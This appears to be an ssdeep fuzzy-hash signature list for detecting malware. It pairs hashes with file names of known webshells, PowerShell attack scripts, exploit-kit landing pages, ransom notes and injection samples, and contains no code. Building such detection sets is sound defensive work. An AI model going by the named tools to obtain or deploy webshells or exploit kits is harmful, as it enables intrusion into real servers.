+12:kIqJmWOv6mIDQYvdrWwXVZQ34l32PM3DIYhMQ3mWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVL9afWFgGQFxR95CI,"idsuper.txt.1.012"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l32pkF03E1W3MiWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLICiWFgGQFxR95CI,"idsuper.txt.025"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l32PB3QpHO3VVqgWcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVL3bgWFgGQFxR95CI,"idsuper.txt.274"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l32mwx3oVX3viWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVL7wJWFgGQFxR95CI,"idsuper.txt.18.001"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l32KH3U3ybZBWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLxhXWFgGQFxR95CI,"idsuper.txt.042"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l32iDs3MyIR034Icz8WcCOkgGQlTJB+kikFPG/M:k3iymIsYv5WuVLhDFhp8WFgGQFxR95CI,"idsuper.txt.24.001"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l32hiJBWJt3/wpx32z0pWcCOkgGQlTJB+kikFPR:k3iymIsYv5WuVLCi+GWFgGQFxR95CI,"idsuper.txt.149"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l32e9C32KVaO3yFgEjUWcCOkgGQlTJB+kikFPG0:k3iymIsYv5WuVL/nK0F+WFgGQFxR95CI,"idsuper.txt.091"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l32DDD32WHWZ31CEkT9WcCOkgGQlTJB+kikFPG0:k3iymIsYv5WuVLyKET9WFgGQFxR95CI,"idsuper.txt.171"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l321lK3MvW33yAv8WcCOkgGQlTJB+kikFPG/IAa:k3iymIsYv5WuVL0KyAkWFgGQFxR95CI,"idsuper.txt.19"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l31wQwp38VEg036bbWcCOkgGQlTJB+kikFPG/IH:k3iymIsYv5WuVL4+VNFnWFgGQFxR95CI,"idsuper.txt.127"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l31urt3L/3hWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLnEWFgGQFxR95CI,"idsuper.txt.150"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l31jZ3A803sQDWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLzCG4WFgGQFxR95CI,"idsuper.txt.6"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l31H3I3Nxy0KWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLLGUpWFgGQFxR95CI,"idsuper.txt.135"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l310kOK3CKrsn312TBWcCOkgGQlTJB+kikFPG/M:k3iymIsYv5WuVLgkOZ2FWFgGQFxR95CI,"idsuper.txt.151"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l30zM3l3oI8VMepWcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLqz9VBWFgGQFxR95CI,"idsuper.txt.021"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l30V03huf3StDpWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLdtDpWFgGQFxR95CI,"idsuper.txt.199"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l30P32U03hdnKWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLqOUiKWFgGQFxR95CI,"idsuper.txt.129"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l30n3hrRfR03zkjKWcCOkgGQlTJB+kikFPG/IAa:k3iymIsYv5WuVL050kjKWFgGQFxR95CI,"idsuper.txt.39"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l30iS32To351UWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVL5k+WFgGQFxR95CI,"idsuper.txt.016"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l30bSuVcCH3x803lWcCOkgGQlTJB+kikFPG/IAa:k3iymIsYv5WuVLOICh8UWFgGQFxR95CI,"idsuper.txt.083"
+12:KIbuECbwmG3WyUuvkVM8yMP6hhc24E0N0tWqPwEGfKdvd:HuE9cyooJ4DfUd,"Arquivo-upload.php"
+12:Ker/mIPGATIDXMwTHHhmub7bozfOxqYeT357DOx:HKIeATItTnB7kzfWeTJfOx,"web02.jsp"
+12:Kehi4GoM5RT70ItWE2fb4eldFNpJ+W8NwAiyb7SsgyRXuWEx:HIT4ItWp0yd/T+W8u41ga+3,"k81.jsp"
+12:k0XD3oCGhkY6awoTLufWf9+Ya7bb8SbYUfeNwoTLufWfGbb8SCONwoTLH4D:k0z2lTLuu6ZwTLuuIvTLH4D,"2016-07-11-Magnitude-EK-landing-page.txt"
+12:k0Vq0L3QgY61XSXf8JI+eYQfYe3rGXSXf8+YQu5Xh4D:k0VqkNq3SN3x4D,"2016-07-29-Magnitude-EK-landing-page-first-run.txt"
+12:k0tJVrdhBgWkY6N9vP7+el1YeJVG9vPhlo+o904D:k0tPrddsmi04D,"2016-07-25-Magnitude-EK-landing-page.txt"
+12:k0OVU7tLrgY6LoPAhoHw+emwfYfoH1SoPAhoHcmwuGcoPn4D:k0gUgo2atawo2a+co/4D,"2016-08-10-Magnitude-EK-landing-page.txt"
+12:k0DmSLKsY6fnAsOEdj+esTYWNOEycnAsOEdZs6kNOAJXnx14D:k0DmS+4BdCZdPBd2nXx14D,"2016-08-05-Magnitude-EK-landing-page.txt"
+12:k0CJ+nR1x4Y6nXqs47j+4+eGkYm47xwuXqs47zGR0j7X14D:k0C+ROT47j+k47xlT477/F4D,"2016-07-29-Magnitude-EK-landing-page-second-run.txt"
+12:k05fOvmY6FG6Qy+edfYmVyG6QeduuX5GKa4D:k0pho4PYoqT5M4D,"2016-08-03-Magnitude-EK-landing-page.txt"
+12:jzRlWm3AoQtA5uWaauLw37saZoZ58E+vB:Zp7SmuWrOw37s4A5SvB,"DemoExe_MD.cpp"
+12:jWzeewkTTrFXSsQgPlAMf6GNOIjloPj7Q3X:MlwkrzQGakjyLyX,"2016-05-26-pseudoDarkleech-Angler-EK-CryptXXX-decrypt-instructions.txt"
+12:jVTRMKvYSBT8GC+l2RSY02c0B75zufJ5Q3ATKaJxN7dcQHR5Bg3BQbFtZoRVtZCa:jTMKQzDR4J0Sfn3+SzR5B06bFtMZCa,"mod_cgi.shell.windows.htaccess"
+12:j/VnOgr1ZPTt5z2NTtN96jb87VK7CN2nfpH/85ru4FiKh:j/4gRZPTt5qTtNO87wffpf2h,"readme.md"
+12:jVCEtA9vTVHK25NLy4+OLyoLCn9PYlTLCn6LyknTZgrUFaEwgGIOJTYTitJ:jVCqA9U2S4+VM7lfzujzJz,"injected-website.php"
+12:juVL0WmMAVIvAoQhuag2ag2+g8LKmafD9Y:mpAev7ku++M2mQY,"DemoDLL_RemoteProcess.cpp"
+12:jrp1Q4epy2QTG4QizmmT9sCqLa5q+nKZmJU+TWdlb9DDnZxQOluQp:jF1Q4ay2QVQimmT9sCV5tnKZx+Cdlb9x,"proxy.jsp"
+12:jQ5DdTBN9CKGVSjew2sRT4t9uhFiJSj01Fjc8aZ8M8QUzJmv:E3VNg/1cT+9uhEJ5Fjc8a38HJmv,"cmdjsp.jsp"
+12:jQ5DdTBN9CKGVSjew2sRT4t9uhFiJSj01Fjc8aZ8M8Qn:E3VNg/1cT+9uhEJ5Fjc8a38Q,"cmdjsp.jsp"
+12:jnAWj/tib2QnEn+44/yPcN+4Z0KA/GrsIVEwCn2QnB:jrtiVq+Bsc0KwGoIVKn5B,"odd.php"
+12:j/ltWmmvlAoQhu9C/BkbVSTRQKSRFRk8ev1fAkVlaYVaWFRSR7hWv:rWvl7kueBm4NQKMZepAYwWFRMFWv,"dllmain.cpp"
+12:j/ltWmmvlAoQ22C/BkbbRQKSRtVaYVaWFRSR7hWv:rWvl75rBm1QKMtwYwWFRMFWv,"dllmain.cpp"
+12:jG0/fS4gZSJBpSy3C/ZAo9bAAGmrJL57lAo98AqVAxAVAqcIAVA6AUATgAKV6cMP:FnHyRNx557lN8rasiIe5b4gdMcMqpcF,"stdafx.h"
+12:jG0/fS4gZSJBpSy3C/ZAo9bAAGmrJL57lAcAVAVAq9AuR6cMqpcP9:FnHyRNx557l7seP5wcMqpcF,"stdafx.h"
+12:jG0/fS4gZSJBpSy3C/ZAo9bAAGmrJL57lAcAqcIAjjV6cMqpcP9:FnHyRNx557l7iI+jMcMqpcF,"stdafx.h"
+12:jG0/fS4gZSJBpSy3C/ZAo9bAAGmrJL57lAcAqcIA6AKtAjjV6cMqpcP9:FnHyRNx557l7iI5N+jMcMqpcF,"stdafx.h"
+12:jG0/fS4gZSJBpSy3C/ZAo98AqVAxAVAqcIATgAmV6cMqpcP9:FnHyRN8rasiI4gdMcMqpcF,"stdafx.h"
+12:iwRMpRdWXmIpxwYfVISzpUeQX5npBX5nQe4DkWOJx76EYNx7JAgSP1tGu:QpWXmIpfqApUeQX5npBX5ncDkWOJx76O,"20144.php"
+12:it/mdWXmIpxwYfVISzpUeQX5npBX5nQe4DkWOJx76EYNx7JAgSP1tGu:wcWXmIpfqApUeQX5npBX5ncDkWOJx76O,"2015.php.2"
+12:it/mdWXmIpxwYfVISzpUeQX5npBX5nQ6TkWOJx76EYNx7JAgSP1tGu:wcWXmIpfqApUeQX5npBX5nHTkWOJx76O,"2015.php.3"
+12:iReFAasW9mdWXmIpxwYfVISzpUeQX5npBX5nQe4DkWOJx76EYNx7JAgSP1tGu:clZW6WXmIpfqApUeQX5npBX5ncDkWOJH,"2015.php.1"
+12:iReFAas/mdWXmIpxwYfVISzpUeQX5npBX5nQe4DkWOJx76EYNx7JAgSP1tGu:clZcWXmIpfqApUeQX5npBX5ncDkWOJxR,"2015.php"
+12:iKkqYn2cMx1KdaLFIp3q37KR+wuX2k/Vl/XLBgBciz2k:iKt1KdaLFz3a3uT/9m5z/,"nishang.psm1"
+12:iKkqYHvdx1K9aLFIp3q37KR+wuX2k/Vl/XLBgBciz2k:iKK1K9aLFz3a3uT/9m5z/,"nishang.psm1"
+12:IfkLu2yKpV2DMGXjan6R0ETZ31uEgPZQkwoCiGkqsYXn:I8LiK/OHXw6eETZFuEgCkpCVkbKn,"VirusShare_ab454997df8fc14e4089847d443cf0d3"
+12:icWKz0v5QW9Z10DnRlMJLGhTXOKiOdvKIqr8UlhfKVYn2aD2Sz5h:Pjz0v5QW9r0nHNvKXrHlhfKVY2jk,"config.php"
+12:icKyUSEje/LS3hP9kp4RcGTy/UhOkHrXllgTbVw2CQF59kB+cjZwjIfEQI:lwvjejSR2cyAOkHjlaTbVNcB+SZwfv,"__init__.py"
+12:icKyUSEje/LS3hP9kp4RcGTy/UhOkHrXllgTbVw2CQF59kB+cjNq3L835rI:lwvjejSR2cyAOkHjlaTbVNcB+Sp8,"__init__.py"
+12:icKyUSEje/LS3hP9kp4RcGTy/UhOkHrXllgTbVw2CQF59kB+cjdx/dwSIvpII:lwvjejSR2cyAOkHjlaTbVNcB+Stu3,"__init__.py"
+12:icKyUSEje/LS3hP9kp4RcGTy/UhOkHrXllgTbVw2CQF59kB+cjA2:lwvjejSR2cyAOkHjlaTbVNcB+SX,"__init__.py"
+12:icKyUSEje/LS3hP9kp4RcGTy/UhOkHrXllgTbVw2CQF59kB+cj4FEKI:lwvjejSR2cyAOkHjlaTbVNcB+S51,"__init__.py"
+12:icKyUSEje/LS3hP9kp4RcGTy/UhOkHrXllgTbVw2CQF59kB+cdw:lwvjejSR2cyAOkHjlaTbVNcB+2w,"__init__.py"
+12:icKy69/d8Lkp4WcGhJEUhOkHYlrxqTbVx2CQF59fLbrGIUMK:lu9ldn5OkHYHqTbVcbm,"RequestException.py"
+12:i3YMuYdWXmIpxwYfVISzpUeQX5npBX5nQe4DkWOJx76EYNx7JAgSP1tGu:GJu6WXmIpfqApUeQX5npBX5ncDkWOJxR,"20144.php"
+12:HXpvSZJ4v4+Qor0F6hYRA4WeVVHi4WeVuNdIpfYABG+RkEzzWYYL:HZvSZqv4+dravCByiBjHDdIHYL,"js-save.link.js"
+12:htmqo/HRzKSofJE92nMCqvK6qU26KWlnbCQNvzt6KWlnbCQ9:5oxoi92M5y6qUDvz2,"readme.txt"
+12:hnMQbwzRQ6QclfhxxEdWr+YZrH3atJMlgOt0quoQL:hMxRQspxCQnZrH3atEx0h,"testevull.txt"
+12:Hm/UczeQYtQhw8vRciX13C2eLWyplgd+Ah5eMAmTbigx/AmYVzvRAX0XDeEkWNnB:8zQtQ7t8RaeWJxDSRAX0XqvinR3mpK,"PerlKit_cmd.v0.1.pl.txt"
+12:Hj3jgOX6VaQFw3GxJ8OEvWfF/gAL6GVaw:DjgOX6VbqGxJnvd/g0Iw,"说明.txt"
+12:HIXEYNx7JAgsuANQbs4tC7YNXm6vxwCrBIC3vq4SE/ROzb:o027JARbNQQgXm6vf+Cvq43/ROP,"mailer-alligator.itz-ciberscript.php"
+12:HfJHYNXm1xwYfVISuUjvTPLQc4RLmmOcm+:HhHgXm1fqNU3PP404F,"ownar.php.1"
+12:HfJHYNXm1xwYfVISuU6EYNx78NLYNx7BAgHlzL47kzKV0zV+jL:HhHgXm1fqNU6E278NL27BA8LJm0zo,"testavul.php"
+12:HfJHYNXm1xwYfVISuU6EYNx78NLYNx7BAgHcS7slzg2OKX2Cy72F2R/jWN:HhHgXm1fqNU6E278NL27BAbPlzg2h2ZC,"testavul.php.2"
+12:HfJHYNXm1xwYfVISuU6EYNx78NLYNx7BAgHc4RLmO0zV+jL:HhHgXm1fqNU6E278NL27BAb40O0zo,"ownar.php"
+12:HF7jzBvx/dyZRLRB3ysFMmqiDi/7fVX8xOApTDhfv+a7+uhb/shVSP2R/6o:lJx/YzldiswMtxDhf5+oyPF,"phpkit.py"
+12:h/DuCXh7VLhBdlVKEJGjiFB2VLicZVbGDVL61IKI52f9EzM2ypplG:n7dBd7MjnvPI4FzGzipW,"qwXnsmRCYvrV"
+12:HaGIewY7taKlzXcqI4c+oUVCP+WGyWHQp3PDVzvBs4NXzY/zJmv:Ow74szXcz0oUE+WJ/B8/zJmv,"perlcmd.cgi"
+12:H6LsKyBBsKK7IUgjgd6zj69YIFAlJHBvjolHVQ3YSIvuJXK5iZRjS96Iv2aM7Kq:aLs92T8adi8tAKF2/IL+aM/,"tests.py"
+12:H0s2j8nmWoQ65Ft+Oxb2PewY2JhKEx9805oIi8x+Ezm/:P24nmQuX+C8w2vKY9m8x+Ezi,"cgi.cgi.pl"
+12:gUzeuhMuqCFXSsHIxtPlAMf6GNOkh4oZ5XCQo:32upzH2aK6,"2016-06-01-CryptXXX-decrypt-instructions.txt"
+12:GrYitYhHYWvftIfy+590WpHMm4UBWvSmyWyplAJh19A0Y6GFsCnJSt4JV3Quf:Gsp4cSy00mv4aKsIqoGFuO,"cmd.cfm"
+12:gPRQYVfFPYBnloxYM2k+qIAvUzdW9ibsoj3wpPBYXY4xxrOvSyQcn:K2okdk+qIAvUzvbjcpiZOvSPc,"198409a2cfbf8adbb703a3881d2bd6c3_php.txt.orig"
+12:GKGfpk20U6KcpInmKvqKPg3DLakfxHaH0Ad5HlS85RtRK2e+56dUTR/K2do+N3:GKGfpBDLcqnmKvqKo37fAd5HBLo2edWb,"4b6a747cdeabff16576745a0f07d602e_php.txt.orig"
+12:gJqt1w+Cl6He/ziH5AhahWRJCGyqr9xrC8odyr:gJqt1w+ClgfH6QYNy23+8H,"manifest.json"
+12:gExYxtxy4gTeg4Wg4v1FZmduOOzW+fcC1qgSudfcC1qmHwv:gYcDTLQt1FZ2MzW+Vdg,"time.php"
+12:/G3jcmiuwFtPBGOWZvX4WFSd3ghTnuAlNvVuiqQIHl9a1+IPDI/9Dbejs011X3yN:+3jB4gphXfSd34qUNvVOl9aVDI/9Qz1e,"2016-07-29-Magnitude-EK-flash-redirect-second-run.swf"
+12:FvCWdYQGootwB0rJI2xjUkGaB2zp66g1mf7/wutJ:FKBLtwB0l3okfEzu1yB,"php-at-end-body"
+12:FbXgMPfiPX1pmBRpC7r/h7yTQIoAKnCLfeYv:FbwMXiPrmBRpC7r/h7gpoAKnCLDv,"z-2016-01-05.php"
+12:F3fGsKWyu9Rvbj3CxNnzble583fG877QvXEzZyAwzQV2+KA6UAXfNEZ/dTX33bQO:jrZjyf8SnHKuFe+0ZvO/dXb9g+jpA2,"pws.txt"
+12:F3fGsKWyu9Rvbj3CxNnzble583fG877QvXEzZyAwzQV2+KA6UAXfNEZ/dTX33bQA:jrZjyf8SnHKuFe+0ZvO/dXb9g+jpAI,"pws.txt.001"
+12:EYGQp5yRY9oNI730RJYnPhnfLCkDq45XVQmXChoAWnEJYy9dvmgVo+4ZSNyz:XGQ7y7WNljCkDqEXV3XIqoo+hK,"iputil.py"
+12:EWQ5Hz+xG3dfgozBeCX1SdjCxXRK/LSmwJSz08CLTNKZG4wKw+9DdHY4U0RNmivA:GJ9zHkuDkLSJ+ELb9z+Jd44Ty9,"Remove-PoshRat.ps1"
+12:eTIbCp41IedTIqTKI0F2lPymlnVSFUK0l4hK1GVlFZ:eTIbCpEIUTIqTKJF2RywVSF1hdRZ,"jsp一句话.txt"
+12:EqJmUXhO7a8DRWc0/1oDRW4YkWvdacdUDUM1jo5itqqxSsJIf4rMJDV4AiQdFRmR:LDO7agRWJ/2RWHkuscCDhto5iYODIAr7,"gate.php.js"
+12:EqJmuLaAKVAn4kII+OpQj/OFjsqIO9sOoWxvkhRbQgkv55ZCoRqbaWzJmv:L3a5h0Qk5HNoGvkBkleNJmv,"Simple-Backdoor.php"
+12:EqJmAy5tEu0ndsK6N13Jsd2f3z9RkKRVx8Rar3VI1j9B3X3KfL:LRyAuF13Ow79RbLEazVI1jL3XmL,"cloudfusion.me.js"
+12:EE2WOEsNGjwzMD/ue4wcIwhRX0W+IW8J1JYXztTTGBIJSFPu4BRhpDL:zLswjwzMrue4wc/bX0W+IWM+VGBIJSVn,"obfs1.php"
+12:e8Vy1Q80DoYJRA/n4/WTNjhRTI2RTwv2C5F/DhChCYG0V0:tslQTo4/WT5HTI2TgJNDVYs,"JSP_KIT_cmd_win32_by_unknkown.jsp.txt"
+12:e8nsy1fi6WURAtsjn9eARWTNEhRTd2RTHv26WVDshCYdNAqk:Esq0tj9eKWTGHTd2TPqD5YfAqk,"102.jsp"
+12:e8nsy1fi6WURAtsjn9eARWTNEhRTd2RTHv26WVDshCYdNAqa:Esq0tj9eKWTGHTd2TPqD5YfAqa,"cmd_win32.jsp"
+12:e8dcy1Z80DoYY/n4/WTNjhRTCd1Twv2C5F/DhCaSoT0VV:1csKQ04/WT5HTm1TgJND1So0,"JSP_KIT_cmd_by_unknkown.jsp.txt"
+12:e8d0sy1oi6Wvtsjn9eARWTNP2PhRTCxlW1Tnv2WhmDAHEGdwDqk:1PsPoj9eKWThcHTUW1Tv14DAHtwDqk,"cmd.jsp"
+12:e8d0sy1oi6Wvtsjn9eARWTNEhRTCa1THv26WVDskqAqY:1PsPoj9eKWTGHTP1TPqDnqAqY,"cmd.jsp"
+12:E1obTnpRXNl8iFSMmWQsCCMtuGbX+syDQUJkMGN9x:EebVRXN14sTTsyDQUJlI,"list.php"
+12:dUg430k11Iz5fge5BizsCGYmMEjDMWyxqJUQlbQTE+AMtEOtN2kh:BKa5JiYCGfjm8TZQzZ9NB,"upxx.php"
+12:DMuZHLiITI8BsrRhSLIqxmKZqjXeYjFuvj9sevjORB1zO9r3bHQwiGtRb:DBiIU8BNh7ZqyYjsuiiRB16Kwlt9,"index.php.013"
+12:DiVjcmiuwFtPBGOWZvX4WFSd3ghTnuAlNvVQq5Hvroj9DxaZlRJTzT6aEQVxw41u:SjB4gphXfSd34qUNvVPEj9wRdOQMfbBT,"2016-08-05-Magnitude-EK-flash-redirect.swf"
+12:DGjcmiuwFtPBGOWZvX4WFSd3ghTnuAlNvV/4+T0KI6+LwZEnLbHOwB5Ye9kdw0b+:SjB4gphXfSd34qUNvV/4E0RLw+nLbuwT,"2016-07-11-Magnitude-EK-flash-redirect.swf"
+12:DaR5YM8wj0m2S+M3E5iWSatDrVKX3YPBmjuHAkLNI0mh/uaNiS8f5AL:uDmdSDyoatlUYPA8lpOhbnWeL,"xslt.asp"
+12:clUATIbCp41IedTIqTKbVFKJTymlnkvSFUK0l4hKsJVGVl/k:sPTIbCpEIUTIqTKbVF8TywkvSF1hjAjk,"JSP一句话"
+12:cjcmiuwFtPBGOWZvX4WFSd3ghTnbN/+o3f3AfeJFkcynXb2fZlS3JQcHjFDnLKUH:cjB4gphXfSd34J3PAf6h2Xb0lWQyFzJH,"2016-07-05-Magnitude-EK-flash-redirect.swf"
+12:C1gKMRuC7I4ojU7w4S1sLW5BK2FsR84yaeWzw4m1sLW5WR:C1rMRuWI4oYjpW5BKxRLyrW7NW5+,"Invoke-PowerShellUdpOneLine.ps1"
+12:BWDMYWhQdH9jXbl0pRIIIIadK1MpRIIIIWgbpRIIIIad6So2EllW:PYfddjRoQdxcYQd6vFm,"LoadLibraryA.asm"
+12:BWDMfqbwH9wuQIIXbDqDBpRIIIIgmMpRIIIIa51pRIIII87g2pRIIIIaFSERUoW:PfqcdM7qDHaQJC7nQFg,"GetFuncAddress.asm"
+12:BWDMf+Eb9DekXp+jb0YpRg/i2pRrs4fGhrYpR8Pvg/OjkMki2pRoio+DDJ:PfPDekXpA0sCeRrsiXsTqE9,"GetProcAddress.asm"
+12:BVWR7HL7Klqrf6ExF0gw+J0FRspIV9FdaUHOhM9yUZ01xkb:BATLWwrf6EH07+J0FKo9aUHOhM8Ulb,"upfile_write.asp"
+12:BMQowP40Ugbs+zNZZeFUK047zwpe/E5hMaqFUK0l4hKXGVp:Wh0UMsezMFD7T/E5hTqF1hJb,"ASPX one line Code Client by amxku.aspx"
+12:BMQbwuOaXkphhfVeZ5COL/Lm6q4nkf3lSfKZym+Y6+qhp2Npq7Uf/+5l5dspl0Jy:Wy0ThfP6q4ny3AUl2qSUevel0JHtXs,"2016-06-30-realstatistics-gate-Neutrino-EK-landing-page-after-tne.mx.txt"
+12:BMQbwuOaXkhTcqaCxQ443lSfKZCY63H9Rq7/3gNPoUXy/+5l5WffHolYWhT6nQ/L:Wy02xCxQ443AUQRQ/3kXRvWopAQ/3icz,"2016-01-04-Neutrino-EK-landing-page.txt"
+12:BMQbwuOaXkbuYt9IQq4zY6zoHNV3lSfKZCfvaRbuOOPo1x/+5l5hR+2HVvaRbuOg:Wy0bRIX4aP3AUzKrvyss9q6s,"2016-06-29-afraidgate-Neutrino-EK-landing-page-after-marketingguerrilla.es.txt"
+12:BMQbwuOaXkam5/Q2ie0+6W4zY6w3lSfKZ5voo6KBPoh/+5l5qqyRrjYWhTzZRj68:Wy0N/0e0u4a3AU9o69JvqqwxZRW3s,"2016-06-28-pseudoDarkleech-Neutrino-EK-landing-page-after-gennaroespositomilano.it.txt"
+12:BMQbwuOaXk9FoHzWltPUY4n33lSfKZeY6NBgANPospqjbl5BxyJDkHvSSWh7x6Ar:Wy0oH6eY4n33AUIpNIBxyJDkPmvks,"2016-06-24-pseudoDarkleech-Neutrino-EK-landing-page-after-fiocchidiriso.com.txt"
+12:BMQbwuOaXk7Jp/Ap37R6LMFfOnF47fY6Bg3lSfKZvb3qUsrQnNpqrf/+5l5HP0s4:Wy0d26y+443AUvTaMEevHVbG4gmStss,"2016-06-28-Neutrino-EK-landing-page-after-mu-media.co.uk.txt"
+12:BMQbwuOaXk6O4zY6NPH3lSfKZc1QRCEgXpufOpqefpqjbl5ytXRjWCEgXpufRSS4:Wy06O4Pf3AU4lEgvFBIytXRJEgFVJss,"2016-06-10-Neutrino-EK-landing-page.txt"
+12:BMQbwuOaXk6O4zY6Nc6c3lSfKZ59STqTMNPoQRg/+5l5jSSWhUys7a2NA1Qb:Wy06O4P/c3AU59STygjZvjmWys7aZs,"2016-06-20-EITest-Neutrino-EK-landing-page.txt"
+12:BMQbwuOaXk6O4nyp3lSfKZ7wY6NrEKSpq8iAfpqjbl5xtshRjqTtdTWhJzAKAjTs:Wy06O4nw3AU7WQnZBIxtYRMtdyvkBs,"2016-06-23-Neutrino-EK-landing-page.txt"
+12:BMQbwuOaXk6O4nJ3lSfKZilOrY6NOEOpqq1d0fpqjbl5hoKlsHNKVtjWh+uHU1Qb:Wy06O4nJ3AUikO9lgBIfwStCcs,"2016-06-20-pseudoDarkleech-Neutrino-EK-landing-page-after-salentoeasy.it.txt"
+12:BMQbwuOaXk6O4HEW6icrY6Pz3lSfKZ1qMINPoK/+5l5h7zjWUerWh+mVthA1Qb:Wy06O4Gz3AU1aEv1Vd32s,"2016-06-17-pseudoDarkleech-Neutrino-EK-landing-page-after-nuvon.com.txt"
+12:BMQbwuOaXk6O4HEW6icrY6Pz3lSfKZ1qaQLNPoK/+5l5h7VxjWUerWh+mVthA1Qb:Wy06O4Gz3AU1GFEv1VPd32s,"2016-06-17-pseudoDarkleech-Neutrino-EK-landing-page-after-ex.technor.com.txt"
+12:BMQbwuOaXk6O4GfMY6w3lSfKZfxLvzUpqCFf/+5l5hZseYWhIVLUvN6AwZK+1Qb:Wy06O4g3AUf94vFevhSevqVQNQK+s,"2016-06-21-EITest-Neutrino-EK-landing-page.txt"
+12:BMQbwuOaXk6O4GfMY6w3lSfKZfxLvYFRnpqCFf/+5l5hZseYWhIYR2UvN6AwZK+s:Wy06O4g3AUfG9vFevhSevqCNQK+s,"2016-06-21-pseudoDarkleech-Neutrino-EK-landing-page-after-fsm-europe.eu.txt"
+12:BMQbwuOaXk6O4GfMY6w3lSfKZfxLvY33pqCFf/+5l5hZseYWhIoGUvN6AwZK+1Qb:Wy06O4g3AUfG35vFevhSevqoxNQK+s,"2016-06-21-Afraidgate-Neutrino-EK-landing-page.txt"
+12:BMQbwuOaXk6O4GfMY6w3lSfKZfxLvbDaOPjmOpqCFf/+5l5hZseYWhIVDaOPjmRS:Wy06O4g3AUfNPZvFevhSevqFPRNQK+s,"2016-06-21-pseudoDarkleech-Neutrino-EK-landing-page-after-xenon.com.au.txt"
+12:BMQbwuOaXk6O443lSfKZrWwY6N6PDOpqUqfpqjbl54LRjrAioGsCLWhFP1Qb:Wy06O443AUrWW6PSYBISR0Gz6DPs,"2016-06-20-pseudoDarkleech-Neutrino-EK-landing-page-after-contaratosbeach.gr.txt"
+12:BMQbwuOaX4nQ3lSfKZrWwY6N4DJTL3PoUXypqjbl5HPrHWh9SgieRjW3n87Z1Qb:WyyQ3AUrWWw1XqIHqfRWSZs,"2016-05-25-EITest-Neutrino-EK-landing-page.txt"
+12:BMQbwMR9qS2y9G6QclfVI0kMxCfubADHiHB0XixGIQUBbGC9/nimiM4:WmbV2kGsq0kMx69TpXixG8GChniS4,"mal-index-iframe.htm"
+12:bmOGqJHyTcZRUg26zVX6ZXDj0BkWwEYNx7JAgXhU:5HPjojakWN27JAEhU,"Summer.txt"
+12:BfObTnr984nTeu8MMupFawh09s0Wyplvy0xwuEvgwuE12Em92Hio6KdB6dGG:BmbX9v6ufMG/onWjgw4ErH56KdO/,"up.php"
+12:BBVnqo0PMN+u5VaBkBc04OE8Scv8w0WJ5/L5RL0ZUELJ4wXa:BB1F0PuLHBR2ckwvbHunCGa,"INSTALL"
+12:B6Qclf+AT4xT0XdZQjoEnQx870icE0EbdGVlAeT+IJAXYuccu+9iAGJowHhZotwq:BslTdvQ8Tu70icEl4zT+hi+9RHwHhZCd,"cfmShell.cfm"
+12:B6Qclf+AT4xT0XdZQjCQx8AicE0EbdGVlAeT1JAXYDcu+9iAGJowHhZotwzQL:BslTdvQvuAicEl4zT7+9RHwHhZY,"mycode12.cfm"
+12:AwBsV49LaPL1vFJKzYLtJe7tNQYB6qLJJ5MKSK2woNDhYiMxYYp+QSxsbFY/sK:LBs1PL1IaJk7LNLJJ5no52zm+/S+be0K,"Download.ps1"
+12:aiiaUM4VTPCUM51n0Lcu8KUMdOVrWL1dT:mr+1nIiWLH,"weexceptions.py"
+12:/AHeFIa4Qa9a4QaYI+aI+HHlo9atloooNF9aoooooooNHlt3aXgloooNF9HeF1l5:p,"2016-07-18-pseudoDarkleech-CryptXXX-decrypt-instructions.BMP"
+12:AGWSV7gEI8krXBddNtNNpBLV2nxfCzWnViwCnNDhYE2vMM1YYLouiCfiL4QR0wRW:X28OXBdH77BL6aqCn52CnTrLzRbVLC,"ExetoText.ps1"
+12:aGnx6Hx6R6OHhRhYVJ3Gli5fA8R4rzTXIxLfH0nx5McsPwgl0V8I7n:fnYHY4gdYVJ3Gl2fxR4DItMnTMCfVzn,"php一句话"
+12:AG4BSC59um/lzLbNROMoqUKLbzmis07zWnViwCn1DhYYdFMh8OXvhLL1o8Y6x:8tRLb3OXqUKLPmX0qCnx2vW+hL5iw,"TexttoExe.ps1"
+12:Af49/zwuV1p0OgU/CGQz5mLV5oKSK2wTDhYhOG+4Clcf:1wI1YUT68L7n2m4Cle,"Speak.ps1"
+12:AEXHW4YcP+1vXAfYnLLh3w79i+tvV+6iPgCjyimkDgii+/FR+XylyiAia9WdF:NP+18YnLlA0+tvVK7D1xNRuyba9q,"Get-WLAN-Keys.ps1"
+12:A9JVpL9yqoAeb5hrvCU8RSesBZNfGSBmJnYeS4oshsU3h59I0USGR7SG8C4KzVYK:EbpJyRbbavRtsBZNfGVwshsMfI0USK7/,"redirect13.php"
